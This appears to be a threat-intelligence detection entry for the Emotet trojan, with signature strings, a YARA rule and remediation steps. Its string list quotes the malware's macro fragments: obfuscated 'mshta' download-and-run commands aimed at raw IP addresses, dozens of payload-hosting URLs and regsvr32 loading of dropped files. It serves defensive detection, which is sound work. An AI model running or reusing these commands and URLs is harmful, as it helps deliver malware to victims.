This detection indicates a file exhibiting characteristics of Emotet.B, a highly sophisticated and modular banking trojan and botnet. Emotet typically steals credentials, delivers other malware (like TrickBot and ransomware), and maintains persistence on infected systems. The presence of strings like 'keybd_event' suggests potential for keyboard monitoring, while numerous obfuscated PDB filenames are consistent with malware development practices.
Relevant strings associated with this threat:
- boot (PEHSTR_EXT)
- bios (PEHSTR_EXT)
- my huge entropy for rng.. blah (PEHSTR_EXT)
- =qc5v4234v5\\23v45234\\22345v2345.7Ru.pdb (PEHSTR_EXT)
- ciTfDCxMQU0a5/DDEyGwn8ta.z4.pdb (PEHSTR_EXT)
- 7laIR+|.XJ5aA0aa.pdb (PEHSTR_EXT)
- browsers.62pbasis.856Junder7O (PEHSTR_EXT)
- \rel\iMS-srvreg56.pdb (PEHSTR_EXT)
- Chen32.pdb (PEHSTR_EXT)
- m3KHLMcF.pdb (PEHSTR_EXT)
- rSVz/f9=GI0.pdb (PEHSTR_EXT)
- @dMlE|vKpq.pdb (PEHSTR_EXT)
- SKRFM.pdb (PEHSTR_EXT)
- JERJWHETW@##HREjwr.Pdb (PEHSTR_EXT)
- he#@1.Pdb (PEHSTR_EXT)
- heerhWHW#@1wHJnERbRW.Pdb (PEHSTR_EXT)
- EWH#@1wHJnERbRW.Pdb (PEHSTR_EXT)
- r.4YM4qhCz5DavnCoPhjjx.pdb (PEHSTR_EXT)
- kO@fbLLEFmk2I_M.pdb (PEHSTR_EXT)
- Pb730.pdb (PEHSTR_EXT)
- WhjrkehLkpe;rltjhpow;elkrjjklWEKL#.pdb (PEHSTR_EXT)
- sNQ.pdb (PEHSTR_EXT)
- +9!myD0iY5!ussu_svXy5bni8J8CU.pdb (PEHSTR_EXT)
- lehAh.pdb (PEHSTR_EXT)
- keybd_event (PEHSTR_EXT)
- @g-e3e_2qalAN+/PaKV/J.pdb (PEHSTR_EXT)
- SrQUFmG.pdb (PEHSTR_EXT)
- XrfZPp2C.pdb (PEHSTR)
- LQYutoXRJpQBI-zyVe.pdb (PEHSTR)
- t_D!Ay=VaDyaKDa.pdb (PEHSTR)
- erjRWJERJketkjQEWYHJ@#.Pdb (PEHSTR)
- ynmNa1OjKdUie.pdb (PEHSTR)
- JOe|OBzjATck#psb/.pdb (PEHSTR)
- hkhjggh.Pdb (PEHSTR)
- CryARr.pdb (PEHSTR)
- zYAamTGB2rfW!Cp+aR.pdb (PEHSTR)
- ewhwwherGW.Pdb (PEHSTR)
- hewrjkrkter#whrje@wg.Pdb (PEHSTR)
- uigjhghio.pdb (PEHSTR)
- QPK+LbZjb*4KV@InYQ*.pdb (PEHSTR)
- odubqa.pdb (PEHSTR)
- 7h4qMQ1edvEOY+wQIOdVR_v.pdb (PEHSTR)
- 3Vv@p=i8qg.ylQJxx!l.pdb (PEHSTR)
- HXe5+GENxShM.pdb (PEHSTR)
- 2ezUVGr!PtB.pdb (PEHSTR)
- iwJL##$@#*$^#%@!^$.pdb (PEHSTR)
- eTiq_WaEN__y9F89zLukjmM.pdb (PEHSTR)
- $.Pdb (PEHSTR_EXT)
- ErJIZwQ%B4X_#*TUuU32vx(c9_@8*C!Bi7dX7o (PEHSTR_EXT)
- 2ZTYXG7K5#RY+(uRRaE&LXIvF!+@>m779sEjBU)d(Mb3_!Z (PEHSTR_EXT)
- DllRegisterServer (PEHSTR_EXT)
- l##B+k&rB$cb^AHa54%*oDqeEuskFn8Vh@V4l (PEHSTR_EXT)
- |b= (SNID)
- b3& (SNID)
- = Replace(tysdjoighdlfkgnxlcdsf.TextBox1.Text, "wgja", "") (MACROHSTR_EXT)
- Text = "cwgjamd /wgjac swgjatarwgjat/wgjaB (MACROHSTR_EXT)
- .Tag = Cells(75, 1) + vbCrLf + Cells(77, 1) (MACROHSTR_EXT)
- Open "c:\programdata\vkwer.bat" (MACROHSTR_EXT)
- strMessage = " " & .Name & " , " & vbCr & _ (MACROHSTR_EXT)
- MsgBox Err.Description, vbCritical, " & " & Err.Number (MACROHSTR_EXT)
- cmd /c m^sh^t^a h^tt^p^:/^/87.251.86.178/pp/_.html (MACROHSTR_EXT)
- CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html (MACROHSTR_EXT)
- cmd /c m^sh^t^a h^tt^p^:/^/87.251.85.100/love3/_.html (MACROHSTR_EXT)
- ://www.preferredsupports.com/cli/rK9sG2/ (MACROHSTR_EXT)
- ://homdecorstation.com/wazf7j/tP4PH/ (MACROHSTR_EXT)
- ://savagerefinishe rinc.com/cgi-bin/Ny1/ (MACROHSTR_EXT)
- ://haqsonsgroup.com/css/LBHRIu/ (MACROHSTR_EXT)
- ://lauramarshall.com/cgi-bin/sxS8ctblr/ (MACROHSTR_EXT)
- ://burialinsurancelab.com/q5kje9/K1mF/ (MACROHSTR_EXT)
- ://lealracecars.com/donnacox/fVqOYBzAUoU/ (MACROHSTR_EXT)
- ://edgetactical.ritabilisim.com/admin/2jKBEGDY0XpcgxF7f/ (MACROHSTR_EXT)
- ://4seasonsflorals.com/yhedjkl/BYwyXorqDywx/ (MACROHSTR_EXT)
- ://boldconsulting.info/bkzh6v/eqbAgc3oMGBsC5VDn1w/ (MACROHSTR_EXT)
- FF = "mshta http://91.240.118.172/ss/hh.html" (MACROHSTR_EXT)
- =RpcereRpceplaRpcece("Gswec:Gswe\pGsweroGswegramGswedaGswetGswea\jledshf.bGsweat","Gswe","" (MACROHSTR_EXT)
- =wsRpceCriPRpcet.creRpceAteobRpceJEct(reRpceplaRpcece(" (MACROHSTR_EXT)
- .bat"," (MACROHSTR_EXT)
- SysWow64\ (MACROHSTR_EXT)
- \Windows\ (MACROHSTR_EXT)
- ://terrassa-cafe.com/9yjxnes/18p2S7bBrdpM6FrAc/ (MACROHSTR_EXT)
- ://moseletronicos.com/wp-content/5/ (MACROHSTR_EXT)
- ://sabaithaimass age.com.au/wp-admin/Hgbn3e/ (MACROHSTR_EXT)
- ://wiremax.avaspadan.com/admin/ItopibIZF3dxpy0/ (MACROHSTR_EXT)
- ://troopsites.com/wp-admin/CzMJm2vfbA4osSHH/ (MACROHSTR_EXT)
- FF = "mshta http (MACROHSTR_EXT)
- /91.2 (MACROHSTR_EXT)
- hh.html" (MACROHSTR_EXT)
- ://littlesweet.co.uk/wp-a dmin/vko/ (MACROHSTR_EXT)
- ://stratusebsolutions.co.nz/wp-content/wyE Ej5jH8xq50rp1/ (MACROHSTR_EXT)
- ://wvfsbrasil.com.br/Acrasieae/LIYNOqCthfZuCWQz3/ (MACROHSTR_EXT)
- ://lydt.cc/wp-includes/6sfYo/ (MACROHSTR_EXT)
- ://lpm.fk.ub.ac.id /Fox-C/faKwS6p6/ (MACROHSTR_EXT)
- regsvr32.exe (MACROHSTR_EXT)
- \rds.ocx (MACROHSTR_EXT)
- "B2L (PEHSTR_EXT)
- w"&"w"&"w.b"&"er"&"ek"&"et"&"ha"&"be"&"r.c"&"o"&"m/h"&"at"&"ax/f"&"ov"&"La"&"ro (MACROHSTR_EXT)
- b"&"os"&"ny.c"&"o"&"m/a"&"sp"&"ne"&"t_cl"&"ie"&"nt/E"&"rI5"&"F74"&"cw"&"ii"&"Oy"&"we (MACROHSTR_EXT)
- w"&"w"&"w.c"&"es"&"as"&"in.c"&"o"&"m.a"&"r/ad"&"mi"&"ni"&"str"&"at"&"or/H"&"C46"&"kH"&"DU"&"SY"&"N3"&"05"&"Gg"&"lC"&"P (MACROHSTR_EXT)
- b"&"en"&"ce"&"ve"&"nd"&"eg"&"ha"&"z.hu/w"&"p-in"&"cl"&"ud"&"es/t"&"XQ"&"Bs"&"gl"&"NO"&"Is"&"un"&"k (MACROHSTR_EXT)
- ://bosny.com/aspnet_client/NGTx1FUzq/ (MACROHSTR_EXT)
- ://www.berekethaber.com/hatax/c7crGdejW4380ORuxqR/ (MACROHSTR_EXT)
- ://bulldogironworksllc.com/temp/BBh5HHpei/ (MACROHSTR_EXT)
- B2L (PEHSTR_EXT)
- ://www.yedirenkajans.com/eski/y91J/ (MACROHSTR_EXT)
- ://yahir-fz.com/joy/ZnIjgkgZ18/ (MACROHSTR_EXT)
- ://www.wahkiulogistics.com.hk/upload/AvtsILsT00O/ (MACROHSTR_EXT)
- ://xenangifc.vn/wp-admin/CAzHLCrGgwXw6KTX0lMm/ (MACROHSTR_EXT)
- ://tvstv.yunethosting.rs/nesciuntquos/2SlrSdLBAv7/ (MACROHSTR_EXT)
- ://wahkiulogistics.com.hk/upload/rIpUmi7MrlOc/ (MACROHSTR_EXT)
- ://vanlaereict.nl/domains/T9G5ruQJ/ (MACROHSTR_EXT)
- ://usa-ltd.ie/wp-includes/0x7HPlZ8sGANiI5i/ (MACROHSTR_EXT)
- ://kmodo.us/cgi-bin/D/ (MACROHSTR_EXT)
- \hhwe1.ocx (MACROHSTR_EXT)
- \hhwe2.ocx (MACROHSTR_EXT)
- \hhwe3.ocx (MACROHSTR_EXT)
- :/"&"/z"&"o"&"o"&"m"&"p"&"ix"&"el.c"&"o"&"m.b"&"r/w"&"p-a"&"d"&"m"&"i"&"n/z"&"A"&"R"&"I"&"C"&"P"&"Z"&"w"&"7"&"f"&"F/ (MACROHSTR_EXT)
- ://b"&"p"&"s"&"j"&"a"&"m"&"b"&"i.i"&"d"&"/"&"a"&"b"&"o"&"u"&"t"&"/"&"R"&"T"&"Z"&"0"&"A"&"Q"&"1"&"/ (MACROHSTR_EXT)
- :/"&"/h"&"os"&"t"&"i"&"n"&"g"&"10"&"70"&"6"&"8.a"&"2"&"f"&"2"&"a.n"&"e"&"t"&"c"&"u"&"p.n"&"e"&"t/c"&"a"&"r"&"e"&"e"&"r/0"&"m"&"t"&"N"&"N"&"f"&"b"&"Z/ (MACROHSTR_EXT)
- ://a"&"g"&"i"&"t"&"a"&"si.i"&"d/m/q"&"L"&"C"&"Z"&"W"&"t/ (MACROHSTR_EXT)
- ://d"&"jh"&"o"&"s"&"t.n"&"l/8"&"H"&"O"&"i"&"c"&"o"&"B"&"u"&"f"&"Q"&"N"&"b"&"j"&"b"&"M/ (MACROHSTR_EXT)
- ://c"&"o"&"m"&"p"&"u"&"t"&"e"&"r"&"c"&"o"&"l"&"l"&"e"&"g"&"i"&"a"&"t"&"e.c"&"o"&"m.p"&"k/w"&"p-a"&"d"&"m"&"in/q"&"6"&"9"&"D"&"Z"&"X"&"4"&"k"&"K"&"Z"&"6"&"s"&"s"&"R"&"Q/ (MACROHSTR_EXT)
- ://w"&"w"&"w.a"&"dv"&"an"&"ce"&"ne"&"t.i"&"t/c"&"f"&"g/9"&"8X"&"Pj/ (MACROHSTR_EXT)
- ://a"&"n"&"a"&"m"&"a"&"f"&"e"&"g"&"a"&"r"&"c"&"i"&"a.e"&"s/c"&"s"&"s/V"&"G"&"B"&"J"&"h"&"j"&"p"&"u"&"1"&"9"&"e"&"C"&"b"&"q"&"8"&"g"&"b"&"Y"&"n"&"A/ (MACROHSTR_EXT)
- ://w"&"w"&"w.a"&"lu"&"g"&"u"&"e"&"l"&"d"&"e"&"br"&"i"&"n"&"q"&"u"&"e"&"d"&"o"&"s.b"&"a"&"r"&"u"&"e"&"r"&".b"&"r/w"&"p-c"&"on"&"te"&"nt/E"&"W"&"2"&"3"&"r"&"C"&"3"&"i"&"i"&"1"&"X"&"X/ (MACROHSTR_EXT)
- :"&"/"&"/c"&"ed"&"ec"&"o.e"&"s/j"&"s/n"&"7"&"4f"&"S/ (MACROHSTR_EXT)
- :"&"/"&"/b"&"al"&"ti"&"cc"&"on"&"tr"&"ol"&"bd.c"&"o"&"m/c"&"g"&"i-b"&"i"&"n/G"&"u0"&"xn"&"o0"&"kIs"&"sG"&"JF"&"8/ (MACROHSTR_EXT)
- ://f"&"ik"&"ti.b"&"e"&"m.g"&"un"&"ad"&"ar"&"ma.a"&"c.i"&"d/S"&"D"&"M/q"&"Ne"&"MU"&"e2"&"Rv"&"xd"&"vu"&"Rl"&"f/ (MACROHSTR_EXT)
- ://w"&"w"&"w.ca"&"re"&"of"&"u.c"&"o"&"m/P"&"HP"&"E"&"xc"&"el/s"&"Q7"&"8B"&"ed"&"ri"&"bN"&"JZ"&"bG"&"Yj/ (MACROHSTR_EXT)
- ://www.boraintercambios.com.br/wp-includes/AN4ixiH4Th/ (MACROHSTR_EXT)
- ://brigadir.com/bkp/SwrVs4yU/ (MACROHSTR_EXT)
- ://handboog6.nl/META-INF/f/ (MACROHSTR_EXT)
- ://brb-ljubuski.com/wp-content/2MODCk0UZasTCL6tm/ (MACROHSTR_EXT)
- g"&"sd"&"c.p"&"l/s"&"mi"&"ec"&"io/1"&"9V"&"Yf"&"hH"&"Lp/ (MACROHSTR_EXT)
- Iposiogseogjseiojgei (PEHSTR_EXT)
- opifoipw490fgsjgiseirhj (PEHSTR_EXT)
- kmnEGlDVCccMkxBiCNufvqMJKx (PEHSTR_EXT)
- DinxPcSbSYkurjlEKJbng (PEHSTR_EXT)
- |#d1e49aac-8f56-4280-b9ba-993a6d77406c (NID)
- }#d1e49aac-8f56-4280-b9ba-993a6d77406c (NID)
- |#75668c1f-73b5-4cf0-bb93-3ecf5cb7cc84 (NID)
- }#75668c1f-73b5-4cf0-bb93-3ecf5cb7cc84 (NID)
- &|#b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 (NID)
- &}#b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 (NID)
- y*|#56a863a9-875e-4185-98a7-b882c64b5ce5 (NID)
- y*}#56a863a9-875e-4185-98a7-b882c64b5ce5 (NID)
- C|#be9ba2d9-53ea-4cdc-84e5-9b1eeee46550 (NID)
- C}#be9ba2d9-53ea-4cdc-84e5-9b1eeee46550 (NID)
- L|#3b576869-a4ec-4529-8536-b80a7769e899 (NID)
- L}#3b576869-a4ec-4529-8536-b80a7769e899 (NID)
- |#5beb7efe-fd9a-4556-801d-275e5ffc04cc (NID)
- }#5beb7efe-fd9a-4556-801d-275e5ffc04cc (NID)
- |#01443614-cd74-433a-b99e-2ecdc07bfc25 (NID)
- }#01443614-cd74-433a-b99e-2ecdc07bfc25 (NID)
- |#d3e037e1-3eb8-44c8-a917-57927947596d (NID)
- }#d3e037e1-3eb8-44c8-a917-57927947596d (NID)
- |#7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c (NID)
- }#7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c (NID)rule Trojan_Win64_Emotet_BA_2147818857_0
{
meta:
author = "threatcheck.sh"
detection_name = "Trojan:Win64/Emotet.BA!MTB"
threat_id = "2147818857"
type = "Trojan"
platform = "Win64: Windows 64-bit platform"
family = "Emotet"
severity = "Critical"
info = "MTB: Microsoft Threat Behavior"
signature_type = "SIGNATURE_TYPE_PEHSTR_EXT"
threshold = "2"
strings_accuracy = "Low"
strings:
$x_1_1 = {8b cb 48 8d 7f ?? f7 eb [0-4] ff c3 8b c2 c1 e8 ?? 03 d0 6b c2 ?? 2b c8 48 8b 05 ?? ?? ?? ?? 48 63 d1 0f b6 0c 02 32 4c 3e ?? 88 4f ?? 49 ff cf 75} //weight: 1, accuracy: Low
$x_1_2 = {f7 ef c1 fa ?? 83 c7 ?? 8b c2 c1 e8 ?? 03 d0 48 8b 05 ?? ?? ?? ?? 48 63 d2 48 6b d2 ?? 48 03 d0 41 8a 04 10 41 32 04 34 88 06} //weight: 1, accuracy: Low
$x_1_3 = "DllRegisterServer" ascii //weight: 1
condition:
(filesize < 20MB) and
(2 of ($x*))
}Immediately isolate the affected system from the network to prevent further spread or command and control communication. Perform a full system scan with updated antivirus software, then remove all detected malicious files. Change all user passwords on the affected system, especially for banking and sensitive accounts. Consider reimaging the system if full confidence in removal cannot be achieved, and review network logs for any outbound Emotet-related traffic.